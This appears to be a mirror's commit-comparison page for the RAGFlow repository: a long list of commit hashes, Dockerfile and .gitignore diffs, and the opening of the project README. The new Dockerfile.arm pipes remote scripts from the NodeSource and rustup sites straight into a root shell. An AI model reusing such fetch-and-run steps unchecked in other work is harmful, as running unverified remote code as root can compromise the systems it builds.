Mirror of https://github.com/infiniflow/ragflow.git, synced 2025-12-08 20:42:30 +08:00.

Compare commits: 765 commits
| SHA1 | Author | Date | |
|---|---|---|---|
| 2f33ec7ad0 | |||
| 3b1375ef99 | |||
| 2c05e6e6bd | |||
| 8ccc696723 | |||
| 1621313c0f | |||
| b94c15ef1e | |||
| 8a16c8cc44 | |||
| b12a437a30 | |||
| deeb950e1c | |||
| 6a0702f55f | |||
| 3044cb85fd | |||
| d3262ca378 | |||
| 99a7c0fb97 | |||
| 7e75b9d778 | |||
| a467f31238 | |||
| 54342ae0a2 | |||
| bdcf195b20 | |||
| 3f571a13c2 | |||
| 9d4bb5767c | |||
| 5e7b93e802 | |||
| ec4def9a44 | |||
| 2bd71d722b | |||
| 8f2c0176b4 | |||
| b261b6aac0 | |||
| cbdf54cf36 | |||
| db0606e064 | |||
| cfae63d107 | |||
| 88f8c8ed86 | |||
| 4158697fe6 | |||
| 5f9cb16a3c | |||
| 4730145696 | |||
| 68d0210e92 | |||
| f8e9a0590f | |||
| ba834aee26 | |||
| 983540614e | |||
| 6722b3d558 | |||
| 6000c3e304 | |||
| 333608a1d4 | |||
| 8052cbc70e | |||
| b0e0e1fdd0 | |||
| 8e3228d461 | |||
| f789098e9f | |||
| d6e6c530d7 | |||
| 22c5affacc | |||
| 35b7d17d97 | |||
| 1fc14ff6d4 | |||
| 7fad48f42c | |||
| 77988fe3c2 | |||
| cb00f36f62 | |||
| 7edb4ad7dc | |||
| 66c54e75f3 | |||
| f60dfffb4b | |||
| f1ad778250 | |||
| 7c8f159751 | |||
| c57cc0769b | |||
| 869df1f704 | |||
| 42eeb38247 | |||
| 7241c73c7a | |||
| 336a639164 | |||
| ceae4df889 | |||
| 884dcbcb7e | |||
| 4b57177523 | |||
| 4130519599 | |||
| 0c73f77c4d | |||
| fbe68034aa | |||
| 22acd0ac67 | |||
| 4cf122c6db | |||
| 6a77c94365 | |||
| 80656309f7 | |||
| 9f7d187ab3 | |||
| 63da2cb7d5 | |||
| cb69c742b0 | |||
| 2ac72899ef | |||
| 473f9892fb | |||
| fe4b2bf969 | |||
| c18b78b261 | |||
| 8dd3adc443 | |||
| e85fea31a8 | |||
| 1aba978de2 | |||
| 7e0b3d19d6 | |||
| 788ca41d9e | |||
| 6b23308f26 | |||
| 925dd2aa85 | |||
| b5a2711c05 | |||
| c6e723f2ee | |||
| fd3e55cfcf | |||
| 6ae0da92cb | |||
| 9377192859 | |||
| 42671e08f1 | |||
| b2f87a9f8f | |||
| 878dca26bb | |||
| 445576ec88 | |||
| 04de0c4cef | |||
| 7e65df87dd | |||
| 7c98cb5075 | |||
| 6df0f44e71 | |||
| c998ad7a18 | |||
| 1dcc416c70 | |||
| 8c075f8287 | |||
| 9b90a44323 | |||
| 426fdafb66 | |||
| 02fb7a88e3 | |||
| 0fe19f3fbc | |||
| 9b4cceb3f7 | |||
| 65255f2a8e | |||
| 9dd380d474 | |||
| 0164856343 | |||
| 4f05803690 | |||
| abc32803cc | |||
| 07de36ec86 | |||
| 87a998e9e5 | |||
| 0aafa281a5 | |||
| 2871455e4e | |||
| f09b204ae4 | |||
| 5a2c542ce2 | |||
| 4d9e9f0dbb | |||
| 6d232f1bdb | |||
| 21179a9be9 | |||
| 9081bc969a | |||
| e949594579 | |||
| 1a1888ed22 | |||
| 97e4eccf03 | |||
| b10eb8d085 | |||
| 1d2c081710 | |||
| ad09d4bb24 | |||
| b9c383612d | |||
| ab9efb3c23 | |||
| 922f79e757 | |||
| c04686d426 | |||
| 9a85f83569 | |||
| 5decdde182 | |||
| def18308d0 | |||
| fc6d8ee77f | |||
| 5400467da1 | |||
| 2c771fb0b4 | |||
| 667632ba00 | |||
| a82f092dac | |||
| 742d0f0ea9 | |||
| 69bbf8e9c5 | |||
| 12975cf128 | |||
| 99993e5026 | |||
| 15b78bd894 | |||
| f8a479bf88 | |||
| f87e7242cd | |||
| fc1ac3a962 | |||
| 212bb8e601 | |||
| 06abef66ef | |||
| 0abc01311b | |||
| 1eb6286339 | |||
| 4bd6c3145c | |||
| 190e144a70 | |||
| 527ebec2f5 | |||
| a0b7c78dca | |||
| 54f7c6ea8e | |||
| f843dd05e5 | |||
| 3abc9be1c2 | |||
| e627ee9ea4 | |||
| 6c1f1a9f53 | |||
| b51237be17 | |||
| 5daed10136 | |||
| 074d4f5031 | |||
| e9f5468a49 | |||
| a2b4d0190c | |||
| c8097e97cb | |||
| fc172b4a79 | |||
| 0bea7f21ae | |||
| 61d2a74b25 | |||
| 1d88b197fb | |||
| b88c3897b9 | |||
| 2da4e7aa46 | |||
| cf038e099f | |||
| 88d52e335c | |||
| 13785edaae | |||
| 6d3e3e4e3c | |||
| 6b7c028578 | |||
| c3e344b0f1 | |||
| e9202999cb | |||
| a6d85c6c2f | |||
| 7539d142a9 | |||
| e953f01951 | |||
| eb20b60b13 | |||
| d48731ac8c | |||
| b4a5d83b44 | |||
| 99af1cbeac | |||
| 63d0b39c5c | |||
| 863cec1bad | |||
| e14e0ec695 | |||
| 6228b1bd53 | |||
| e18f407604 | |||
| 60767e66e0 | |||
| cc6a48b128 | |||
| 19396998eb | |||
| 89b05ad79f | |||
| 884fd83dc7 | |||
| c739b68b29 | |||
| 35e880c432 | |||
| 733219cc3f | |||
| 21f2c5838b | |||
| 20f3f54714 | |||
| e4765ebe0c | |||
| 3f263df3ef | |||
| 404cdc0b6d | |||
| f2c4d53c58 | |||
| 642006c8e2 | |||
| 59ba34e167 | |||
| 4580ad2fd7 | |||
| 11dd23d8aa | |||
| c5c3240c4c | |||
| 0f95086813 | |||
| 9b3f5fd38b | |||
| 6c26872799 | |||
| 85247e6837 | |||
| 17ada637db | |||
| c9d7a34690 | |||
| 96438ca821 | |||
| 7927d80a84 | |||
| be431449bd | |||
| 02985fc905 | |||
| 6f438e0a49 | |||
| 5efb3476f2 | |||
| 83c673e093 | |||
| 8d2f8ed561 | |||
| 73a03287a5 | |||
| 85f10f84bd | |||
| 9cfd521d67 | |||
| e91af1dff9 | |||
| 9065fb1050 | |||
| 99b634c68d | |||
| 79426fc41f | |||
| be5a67895e | |||
| 5a4e64e741 | |||
| 2302a6baba | |||
| a74c0ccce0 | |||
| 8e75a23ad0 | |||
| 4121636084 | |||
| 3738dd71ab | |||
| 9729ca2aed | |||
| e5caa702f5 | |||
| 644f68de97 | |||
| b4ef50bdb5 | |||
| 5b5e3677b6 | |||
| c9551b7f68 | |||
| 4810cb2dc9 | |||
| d92e927685 | |||
| 7bdd5a48c0 | |||
| d3ff1a30bf | |||
| 6acc46bc7b | |||
| ef8728a314 | |||
| 5169299826 | |||
| bd19656c8f | |||
| c59c1b603d | |||
| c9caccf354 | |||
| eedec157a7 | |||
| c6c3961250 | |||
| 6b3a40be5c | |||
| 1328d715db | |||
| a3a5a9966f | |||
| 78ed8fe9a5 | |||
| 853aa121a9 | |||
| 54fc6dcf01 | |||
| da8802d010 | |||
| d73a75506e | |||
| 13bcfd7ebd | |||
| aa8b021478 | |||
| e013ac52af | |||
| 06700850df | |||
| 7a08e91909 | |||
| 77f0fb03e3 | |||
| da2d8b8267 | |||
| b75115264d | |||
| 8badf3f423 | |||
| eb8feaf20a | |||
| 936d8ab7dd | |||
| 68d1315079 | |||
| 6baba54e9e | |||
| ad48e8d915 | |||
| cafdee536f | |||
| cd861e3653 | |||
| e9e39d57ce | |||
| 94cb66ba80 | |||
| 9a6dc89156 | |||
| fdd5b1b8cf | |||
| 827042f72b | |||
| 37be0ff3d3 | |||
| a313b77cdd | |||
| 4fecc2fae6 | |||
| ff75008801 | |||
| e3cf14a3c9 | |||
| 6529c764c9 | |||
| 44184d12a8 | |||
| 8779aa1986 | |||
| 411c645134 | |||
| afccbc88e8 | |||
| 33e78cf638 | |||
| 193aa3ba88 | |||
| ffb3fc4bf5 | |||
| 6ccfbca204 | |||
| 439da32234 | |||
| db8f83104f | |||
| f43db8bc51 | |||
| ce587cba56 | |||
| 5164835681 | |||
| c981a57616 | |||
| c7d00c2272 | |||
| aed1bbbcaa | |||
| 19ded65c66 | |||
| ad6def4178 | |||
| ed6a693820 | |||
| 1d5a9b74ff | |||
| e34817c2a9 | |||
| 60428c4ad2 | |||
| 7bc9742674 | |||
| a199572bf8 | |||
| 06dfb83529 | |||
| 3c19e3125b | |||
| 4ae9de76d4 | |||
| c55e9d16da | |||
| 4c2906d6fd | |||
| 1e2c0c6705 | |||
| ede733e130 | |||
| b67484e77d | |||
| 66e4113e0b | |||
| 0dba1743e3 | |||
| 43199c45c3 | |||
| 3fd7db40ea | |||
| 5650442b0b | |||
| 5b013da4d6 | |||
| fe797bcc66 | |||
| 9542f4484c | |||
| 2452c5624f | |||
| a5c03ccd4c | |||
| d2213141e0 | |||
| 3da3260eb5 | |||
| 07f283b73e | |||
| 29509ff69d | |||
| 216f6495c4 | |||
| f60a249fe1 | |||
| 152072f900 | |||
| 80032b1fc0 | |||
| 5d55e6a049 | |||
| 418700b455 | |||
| eea6565472 | |||
| 3f21603558 | |||
| 3a739e3dd7 | |||
| 4ba1ba973a | |||
| e8b9871fb9 | |||
| e37b0d217d | |||
| 50e9df4c76 | |||
| b9a50ef4b8 | |||
| da11a20c92 | |||
| 955619c8ac | |||
| ad2e116367 | |||
| ccbd4365be | |||
| 9169643157 | |||
| 5cff780ec4 | |||
| ceb0419fe5 | |||
| 74ebc497c1 | |||
| 161cb08bbd | |||
| ff8702f7de | |||
| a973b9e01f | |||
| 5e19423d82 | |||
| 29f7f8b81e | |||
| 6012f376ca | |||
| 8468031e39 | |||
| aac460ad29 | |||
| 753c13d76f | |||
| 0cb588f7bf | |||
| ebdd71ce68 | |||
| 013856b604 | |||
| 61096596bc | |||
| 549d67e281 | |||
| 79c873344b | |||
| 548f01850f | |||
| 3f495b2d22 | |||
| c943517932 | |||
| 935687998e | |||
| 375f621405 | |||
| a99d19bdea | |||
| 906c0c5c89 | |||
| c92d334b29 | |||
| d38f995ba6 | |||
| bc50f68127 | |||
| b24abee364 | |||
| 6fee2962cb | |||
| e67bfca552 | |||
| d5f87a5498 | |||
| d7426d86d5 | |||
| 7ca98848ac | |||
| 32d5885b68 | |||
| f4d182e4ee | |||
| 69b9581417 | |||
| 1e21056364 | |||
| fdfa5d0ad4 | |||
| d96348eb22 | |||
| 100b3165d8 | |||
| 7e60800c95 | |||
| 4b195cc14c | |||
| 7034dc8dea | |||
| 71f2ba1452 | |||
| 1ec84a589e | |||
| eb40377700 | |||
| bbf9d6d786 | |||
| 8c2b91d3db | |||
| 55028b2db7 | |||
| daf86dbf74 | |||
| b2ef6a05a1 | |||
| 6bc3a2d58a | |||
| d69f4ec829 | |||
| ef45526700 | |||
| 79034bd194 | |||
| 60356b52c6 | |||
| 80d703f9c2 | |||
| 022afbb39d | |||
| 792a1a9d91 | |||
| d2b70e73dd | |||
| 37b0829e28 | |||
| b4a281eca1 | |||
| 95821f6fb6 | |||
| bf2ea04d02 | |||
| ac7a0d4fbf | |||
| 9f109adf28 | |||
| cf12c3cc1f | |||
| 29a7b7a040 | |||
| eb42adc818 | |||
| a4d230f12b | |||
| 9352a09c53 | |||
| a0c1d83ddc | |||
| 657019a5a9 | |||
| 58df013722 | |||
| 347cb61f26 | |||
| 264303ba98 | |||
| 1c90c39897 | |||
| 3fcdba1683 | |||
| 915354bec9 | |||
| c0090a1b4f | |||
| be6d5b76c3 | |||
| fb21efd77d | |||
| cf4fff64f8 | |||
| 0b94376cd4 | |||
| 2b5812d0a9 | |||
| 4da3ee400b | |||
| f8602b5286 | |||
| fc8a752cd5 | |||
| 478cd006d6 | |||
| 4d10dbcf95 | |||
| 43cd455b52 | |||
| b54d5807f3 | |||
| 58e95f76c1 | |||
| 06fd35d420 | |||
| 4df75ca84e | |||
| 701e5be535 | |||
| 9ae57eb370 | |||
| fe5dd5b70a | |||
| 1015436691 | |||
| 83c9f1ed39 | |||
| e4f4b30ae3 | |||
| 9bf6f7c9a0 | |||
| b06957e561 | |||
| baeedc699d | |||
| 00943dc04a | |||
| f43cf7c2b0 | |||
| 9e1421b77c | |||
| 13389be3f4 | |||
| a5306e6345 | |||
| 99adeabc85 | |||
| 6a5e1d597c | |||
| 266119bf62 | |||
| 75086f41a9 | |||
| 3657b1f2a2 | |||
| 975798c643 | |||
| 607de74ace | |||
| 2a647162a8 | |||
| d4332643c4 | |||
| 2ea696934b | |||
| 5a6a34cef9 | |||
| 1daa0b4d46 | |||
| 60d406acaa | |||
| 1a6bd437f5 | |||
| 258a10fb74 | |||
| fdc21ec853 | |||
| c2693d2f46 | |||
| ca9c9c4e1e | |||
| bafe137502 | |||
| 2dea8448a6 | |||
| d9868d0229 | |||
| 38a90c32b2 | |||
| eecec7b119 | |||
| 4eeb535946 | |||
| 26de9adb41 | |||
| 0c9a7caa9d | |||
| a5a617b7a3 | |||
| d5618749c9 | |||
| de8267cfd7 | |||
| 740714b79d | |||
| 013db9410f | |||
| b96ba6f831 | |||
| d29fd52e14 | |||
| 99f7bbaaa2 | |||
| 575099df2d | |||
| ddeac9ab3d | |||
| 009e18f094 | |||
| 9c023b6d8c | |||
| 2c2b2e0779 | |||
| 8d7fb12305 | |||
| 7f4c63d102 | |||
| 3e9f444e6b | |||
| 2290c2a2f0 | |||
| dbb8f7b77b | |||
| 8964817d72 | |||
| 0b950da73f | |||
| 30b88e2b91 | |||
| fb66b1e726 | |||
| 198a8b6592 | |||
| 56e3fa2d6a | |||
| 24f9b17ff6 | |||
| 427fb97562 | |||
| 3413f43b47 | |||
| f8aa31b159 | |||
| 669d634d74 | |||
| 59417016a8 | |||
| 1eb1f7ad33 | |||
| 98295caffe | |||
| f5dc94fc85 | |||
| c889ef6363 | |||
| 593c20889d | |||
| fce3f6df8e | |||
| 61557a101a | |||
| 1f967191d4 | |||
| 0f597b9817 | |||
| 1cff117dc9 | |||
| e3f5464457 | |||
| 6144a109ab | |||
| b3ebc66b13 | |||
| dcb3fb2073 | |||
| f4674ae9d0 | |||
| de610091eb | |||
| d57a68bc2a | |||
| a2eb0df875 | |||
| edc61e9b4c | |||
| 472fcba7af | |||
| 74ec3bc4d9 | |||
| a3f4258cfc | |||
| cf542e80b3 | |||
| 957cd55e4a | |||
| 25a8c076bf | |||
| 306108fe0e | |||
| daaf6aed50 | |||
| 3b50389ee7 | |||
| 258c9ea644 | |||
| acd78c5ef2 | |||
| 1d3e4844a5 | |||
| 4122695a1a | |||
| 3ccb62910b | |||
| a6765e9ca4 | |||
| dec3bf7503 | |||
| 745e98e56a | |||
| 1defc83506 | |||
| 65e59862e4 | |||
| 477a52620f | |||
| 7c9ea5cad9 | |||
| f6159ee4d3 | |||
| a7423e3a94 | |||
| 25c4c717cb | |||
| f9adeb9647 | |||
| 04487d1bce | |||
| 68b9a857c2 | |||
| 5fa3c2bdce | |||
| b5389f487c | |||
| 8b1c145e56 | |||
| 92e9320657 | |||
| 5eb21b9c7c | |||
| 4542346f18 | |||
| fc7cc1d36c | |||
| 751447bd4f | |||
| f26d01dfa3 | |||
| cd3c739982 | |||
| 44c7a0e281 | |||
| 8c9b54db31 | |||
| 6a7c2112f7 | |||
| 0acf4194ca | |||
| 89004f1faf | |||
| 5a36866cf2 | |||
| c8523dc6fd | |||
| 840e921e96 | |||
| 5a1e01d96f | |||
| fbb8cbfc67 | |||
| 0ce720a247 | |||
| 47926a95ae | |||
| ff8793a031 | |||
| a95c1d45f0 | |||
| 45853505bb | |||
| b3f782b3d3 | |||
| 16a1d24a02 | |||
| a943aefa4d | |||
| 038ca8c0ea | |||
| fa5695c250 | |||
| e43208a1ca | |||
| fef663a59d | |||
| 83b91d90fe | |||
| f6ae8fcb71 | |||
| d1ea429bdd | |||
| b75bb1d8d3 | |||
| 6c6f5a3a47 | |||
| 80163c043e | |||
| 9fcf9a10c6 | |||
| 38bd02f402 | |||
| 9a0736b20f | |||
| 4fcd05ad23 | |||
| f8fe4154e8 | |||
| 57970570ee | |||
| d185a2e7f2 | |||
| a4ea5a120b | |||
| 15bf9f8c25 | |||
| 18f4a6b35c | |||
| f7cdb2678c | |||
| 3c1444ab19 | |||
| fb56a29478 | |||
| e99e8b93fb | |||
| 5ec19b5f53 | |||
| 0b90aab22c | |||
| fe1805fa0e | |||
| f73f7b969c | |||
| 81d1c5a695 | |||
| 8d667d5abd | |||
| 01ad2e5296 | |||
| fcdda9f8c5 | |||
| e35f7610e7 | |||
| 7920a5c78d | |||
| 4d957f2d3b | |||
| a89389a05a | |||
| d9a9be4b4c | |||
| 6be3626372 | |||
| 1eb4caf02a | |||
| f04fb36c26 | |||
| 747e69ef68 | |||
| c68767acdd | |||
| 4447039a4c | |||
| 90975460af | |||
| 7dc39cbfa6 | |||
| a25d32496c | |||
| 2023fdc13e | |||
| 64c83f300a | |||
| 3b7b6240c3 | |||
| e05395d2a7 | |||
| 169281958b | |||
| abcd3d2469 | |||
| 2cc89211f6 | |||
| 0e3a877e5c | |||
| da64cfd173 | |||
| ff5ea266d2 | |||
| 8902d92d0e | |||
| e28d13e3b4 | |||
| 0b92f02672 | |||
| cf2f6592dd | |||
| 97ced2f667 | |||
| 7eb69fe6d9 | |||
| 68a698655a | |||
| f900e432f3 | |||
| 267d6b28be | |||
| 706985c188 | |||
| 59efba3d87 | |||
| 22468a8590 | |||
| d0951ee27b | |||
| 31da511d1d | |||
| f8d0d657fb | |||
| 923c3b8cac | |||
| 2ff1b410b9 | |||
| f65d6a957b | |||
| 722c342d56 | |||
| dbdae8e83c | |||
| 6399a4fde2 | |||
| 631753f1a9 | |||
| ad87825a1b | |||
| b04f0510f9 | |||
| 1552dca28d | |||
| db35e9df4f | |||
| d9dc183a0e | |||
| 195498daaa | |||
| 4454ba7a1e | |||
| 72c6784ff8 | |||
| b6980d8a16 | |||
| 39ac3b1e60 | |||
| b8eedbdd86 | |||
| 8295979bb2 | |||
| 037657c1ce | |||
| 4fba0427eb | |||
| c74d4d683e | |||
| 0b15c47d70 | |||
| 7d41de42a1 | |||
| 9517a27844 | |||
| cc064040a2 | |||
| cdea1d0a85 | |||
| 1de31ca9f6 | |||
| 4ec845c0a6 | |||
| c58a1c48eb | |||
| fefe7124a1 | |||
| ebdc283cd5 | |||
| 260c68f60c | |||
| 5d2f7136dd | |||
| b85c15cc96 | |||
| 9ed0e50f6b | |||
| b9bb11879f | |||
| dc7afe46fb | |||
| 4f4d8baf49 | |||
| 83803a72ee | |||
| c3c2515691 | |||
| 117a173fff | |||
| 77363a0875 | |||
| 843720f958 | |||
| f077b57f8b | |||
| c62834f870 | |||
| 0171082cc5 | |||
| 8dd45459be | |||
| dded365b8d | |||
| 9fdd517af6 | |||
| 2604ded2e4 | |||
| 758eb03ccb | |||
| e0d05a3895 | |||
| 614defec21 | |||
| e1f0644deb | |||
| a135f9f5b6 | |||
| daa4799385 | |||
| 495a6434ec | |||
| 21aac545d9 | |||
| 0f317221b4 | |||
| a427672229 | |||
| 196f2b445f | |||
| 5041677f11 | |||
| 7eee193956 | |||
| 9ffd7ae321 | |||
| ec6ae744a1 | |||
| d9bc093df1 | |||
| 571aaaff22 | |||
| 7d8e03ec38 | |||
| 65677f65c9 | |||
| 89d296feab | |||
| 3ae8a87986 | |||
| 46454362d7 | |||
| 55fb96131e | |||
| 20b57144b0 | |||
| 9e3a0e4d03 | |||
| c0d71adaa2 | |||
| 735bdf06a4 | |||
| fe18627ebc | |||
| 4cda40c3ef | |||
| 1e5c5abe58 | |||
| 6f99bbbb08 | |||
| 3bbdf3b770 | |||
| 070b53f3bf | |||
| eb51ad73d6 | |||
| fbd0d74053 | |||
| 170186ee4d | |||
| ed184ed87e | |||
| 43412571f7 | |||
| 17489e6c6c | |||
| 21453ffff0 | |||
| be13429d05 | |||
| 5178daeeaf | |||
| d5b8d8e647 | |||
| b62a20816e | |||
| 3cae87a902 | |||
| 1797f5ce31 | |||
| fe4b2e4670 | |||
| 250119e03a | |||
| bae376a479 |
.gitignore (vendored): 8 changed lines

```diff
@@ -29,4 +29,10 @@ Cargo.lock
 docker/ragflow-logs/
 /flask_session
 /logs
 rag/res/deepdoc
+
+# Exclude sdk generated files
+sdk/python/ragflow.egg-info/
+sdk/python/build/
+sdk/python/dist/
+sdk/python/ragflow_sdk.egg-info/
```
```diff
@@ -10,6 +10,8 @@ ADD ./api ./api
 ADD ./conf ./conf
 ADD ./deepdoc ./deepdoc
 ADD ./rag ./rag
+ADD ./agent ./agent
+ADD ./graphrag ./graphrag
 
 ENV PYTHONPATH=/ragflow/
 ENV HF_ENDPOINT=https://hf-mirror.com
```
Dockerfile.arm (new file): 43 lines

```dockerfile
FROM python:3.11
USER root

WORKDIR /ragflow

COPY requirements_arm.txt /ragflow/requirements.txt


RUN pip install nltk --default-timeout=10000

RUN pip install -i https://mirrors.aliyun.com/pypi/simple/ --default-timeout=1000 -r requirements.txt &&\
    python -c "import nltk;nltk.download('punkt');nltk.download('wordnet')"

RUN apt-get update && \
    apt-get install -y curl gnupg && \
    rm -rf /var/lib/apt/lists/*

RUN curl -sL https://deb.nodesource.com/setup_20.x | bash - && \
    apt-get install -y --fix-missing nodejs nginx ffmpeg libsm6 libxext6 libgl1

RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
ENV PATH="/root/.cargo/bin:${PATH}"

RUN pip install graspologic

ADD ./web ./web
RUN cd ./web && npm i --force && npm run build

ADD ./api ./api
ADD ./conf ./conf
ADD ./deepdoc ./deepdoc
ADD ./rag ./rag
ADD ./agent ./agent
ADD ./graphrag ./graphrag

ENV PYTHONPATH=/ragflow/
ENV HF_ENDPOINT=https://hf-mirror.com

ADD docker/entrypoint.sh ./entrypoint.sh
ADD docker/.env ./
RUN chmod +x ./entrypoint.sh

ENTRYPOINT ["./entrypoint.sh"]
```
```diff
@@ -1,25 +1,27 @@
-FROM FROM infiniflow/ragflow-base:v2.0
+FROM infiniflow/ragflow-base:v2.0
 USER root
 
 WORKDIR /ragflow
 
 ## for cuda > 12.0
-RUN /root/miniconda3/envs/py11/bin/pip uninstall -y onnxruntime-gpu
-RUN /root/miniconda3/envs/py11/bin/pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
+RUN pip uninstall -y onnxruntime-gpu
+RUN pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
 
 
 ADD ./web ./web
 RUN cd ./web && npm i --force && npm run build
 
 ADD ./api ./api
 ADD ./conf ./conf
 ADD ./deepdoc ./deepdoc
 ADD ./rag ./rag
+ADD ./agent ./agent
+ADD ./graphrag ./graphrag
 
 ENV PYTHONPATH=/ragflow/
 ENV HF_ENDPOINT=https://hf-mirror.com
 
 ADD docker/entrypoint.sh ./entrypoint.sh
 RUN chmod +x ./entrypoint.sh
 
 ENTRYPOINT ["./entrypoint.sh"]
```
```diff
@@ -1,54 +1,56 @@
 FROM ubuntu:22.04
 USER root
 
 WORKDIR /ragflow
 
 RUN apt-get update && apt-get install -y wget curl build-essential libopenmpi-dev
 
 RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
     bash ~/miniconda.sh -b -p /root/miniconda3 && \
     rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
     echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
     echo "conda activate base" >> ~/.bashrc
 
 ENV PATH /root/miniconda3/bin:$PATH
 
 RUN conda create -y --name py11 python=3.11
 
 ENV CONDA_DEFAULT_ENV py11
 ENV CONDA_PREFIX /root/miniconda3/envs/py11
 ENV PATH $CONDA_PREFIX/bin:$PATH
 
 RUN curl -sL https://deb.nodesource.com/setup_14.x | bash -
 RUN apt-get install -y nodejs
 
 RUN apt-get install -y nginx
 
 ADD ./web ./web
 ADD ./api ./api
 ADD ./conf ./conf
 ADD ./deepdoc ./deepdoc
 ADD ./rag ./rag
 ADD ./requirements.txt ./requirements.txt
+ADD ./agent ./agent
+ADD ./graphrag ./graphrag
 
 RUN apt install openmpi-bin openmpi-common libopenmpi-dev
 ENV LD_LIBRARY_PATH /usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH
 RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
 RUN cd ./web && npm i --force && npm run build
 RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ -r ./requirements.txt
 
 RUN apt-get update && \
     apt-get install -y libglib2.0-0 libgl1-mesa-glx && \
     rm -rf /var/lib/apt/lists/*
 
 RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ ollama
 RUN conda run -n py11 python -m nltk.downloader punkt
 RUN conda run -n py11 python -m nltk.downloader wordnet
 
 ENV PYTHONPATH=/ragflow/
 ENV HF_ENDPOINT=https://hf-mirror.com
 
 ADD docker/entrypoint.sh ./entrypoint.sh
 RUN chmod +x ./entrypoint.sh
 
 ENTRYPOINT ["./entrypoint.sh"]
```
```diff
@@ -1,56 +1,58 @@
 FROM opencloudos/opencloudos:9.0
 USER root
 
 WORKDIR /ragflow
 
 RUN dnf update -y && dnf install -y wget curl gcc-c++ openmpi-devel
 
 RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
     bash ~/miniconda.sh -b -p /root/miniconda3 && \
     rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
     echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
     echo "conda activate base" >> ~/.bashrc
 
 ENV PATH /root/miniconda3/bin:$PATH
 
 RUN conda create -y --name py11 python=3.11
 
 ENV CONDA_DEFAULT_ENV py11
 ENV CONDA_PREFIX /root/miniconda3/envs/py11
 ENV PATH $CONDA_PREFIX/bin:$PATH
 
 # RUN curl -sL https://rpm.nodesource.com/setup_14.x | bash -
 RUN dnf install -y nodejs
 
 RUN dnf install -y nginx
 
 ADD ./web ./web
 ADD ./api ./api
 ADD ./conf ./conf
 ADD ./deepdoc ./deepdoc
 ADD ./rag ./rag
 ADD ./requirements.txt ./requirements.txt
+ADD ./agent ./agent
+ADD ./graphrag ./graphrag
 
 RUN dnf install -y openmpi openmpi-devel python3-openmpi
 ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
 ENV LD_LIBRARY_PATH /usr/lib64/openmpi/lib:$LD_LIBRARY_PATH
 RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
 RUN cd ./web && npm i --force && npm run build
 RUN conda run -n py11 pip install $(grep -ivE "mpi4py" ./requirements.txt) # without mpi4py==3.1.5
 RUN conda run -n py11 pip install redis
 
 RUN dnf update -y && \
     dnf install -y glib2 mesa-libGL && \
     dnf clean all
 
 RUN conda run -n py11 pip install ollama
 RUN conda run -n py11 python -m nltk.downloader punkt
 RUN conda run -n py11 python -m nltk.downloader wordnet
 
 ENV PYTHONPATH=/ragflow/
 ENV HF_ENDPOINT=https://hf-mirror.com
 
 ADD docker/entrypoint.sh ./entrypoint.sh
 RUN chmod +x ./entrypoint.sh
 
 ENTRYPOINT ["./entrypoint.sh"]
```
README.md: 635 changed lines (@@ -1,293 +1,342 @@)

*Previous version of README.md:*
<div align="center">
<a href="https://demo.ragflow.io/">
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
</a>
</div>

<p align="center">
  <a href="./README.md">English</a> |
  <a href="./README_zh.md">简体中文</a> |
  <a href="./README_ja.md">日本語</a>
</p>

<p align="center">
    <a href="https://github.com/infiniflow/ragflow/releases/latest">
        <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
    </a>
    <a href="https://demo.ragflow.io" target="_blank">
        <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
    <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
        <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.6.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.6.0"></a>
    <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
        <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=1570EF" alt="license">
    </a>
</p>

## 💡 What is RAGFlow?

[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.

## 📌 Latest Updates

- 2024-05-21 Supports streaming output and text chunk retrieval API.
- 2024-05-15 Integrates OpenAI GPT-4o.
- 2024-05-08 Integrates LLM DeepSeek-V2.
- 2024-04-26 Adds file management.
- 2024-04-19 Supports conversation API ([detail](./docs/conversation_api.md)).
- 2024-04-16 Integrates an embedding model 'bce-embedding-base_v1' from [BCEmbedding](https://github.com/netease-youdao/BCEmbedding), and [FastEmbed](https://github.com/qdrant/fastembed), which is designed specifically for light and speedy embedding.
- 2024-04-11 Supports [Xinference](./docs/xinference.md) for local LLM deployment.
- 2024-04-10 Adds a new layout recognition model for analyzing legal documents.
- 2024-04-08 Supports [Ollama](./docs/ollama.md) for local LLM deployment.
- 2024-04-07 Supports Chinese UI.

## 🌟 Key Features

### 🍭 **"Quality in, quality out"**

- [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated formats.
- Finds "needle in a data haystack" of literally unlimited tokens.

### 🍱 **Template-based chunking**

- Intelligent and explainable.
- Plenty of template options to choose from.

